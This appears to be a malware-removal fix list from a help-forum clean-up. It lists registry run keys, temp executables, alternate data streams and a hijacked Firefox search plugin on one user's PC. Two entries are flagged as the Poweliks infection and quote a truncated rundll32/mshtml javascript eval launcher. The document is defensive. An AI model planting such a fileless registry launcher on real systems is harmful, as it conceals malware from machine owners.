HKLM\...\Run: [] => [X] HKLM-x32\...\Run: [1194862116] => C:\PROGRA~2\eGames\PUZZLE~3\Register\EGAMES~1.EXE /r "C:\PROGRA~2\eGames\PUZZLE~3\Register\EGAMES~1.rpd" HKU\S-1-5-21-1900449963-656538329-2535759133-1001\...\MountPoints2: {3ae8f960-f586-11e3-8cef-e12f04ac3add} - F:\VerizonSWUpgradeAssistantLauncher.exe HKU\S-1-5-21-1900449963-656538329-2535759133-1001\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks! Handler: intu-help-qb3 - {c5e479ea-0a65-4b05-8c6c-2fc8cc682eb4} - No File Handler: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - No File Handler: x-owacid2 - {5B290518-830E-4C57-A66B-E4F748900C27} - No File FF NetworkProxy: "type", 0 FF Plugin: @microsoft.com/GENUINE -> disabled No File FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\WebSearchober96875825.xml C:\Users\Stacey\AppData\Local\Temp\ose00000.exe C:\Users\Stacey\AppData\Local\Temp\setup.exe C:\Users\Stacey\AppData\Local\Temp\_is1E36.exe C:\Users\Stacey\AppData\Local\Temp\_is57C1.exe C:\Users\Stacey\AppData\Local\Temp\_isA8DD.exe CustomCLSID: HKU\S-1-5-21-1900449963-656538329-2535759133-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks? AlternateDataStreams: C:\ProgramData\Temp:A9223B61 AlternateDataStreams: C:\ProgramData\Temp:CAC06C34 AlternateDataStreams: C:\ProgramData\Temp:EA029835 EmptyTemp: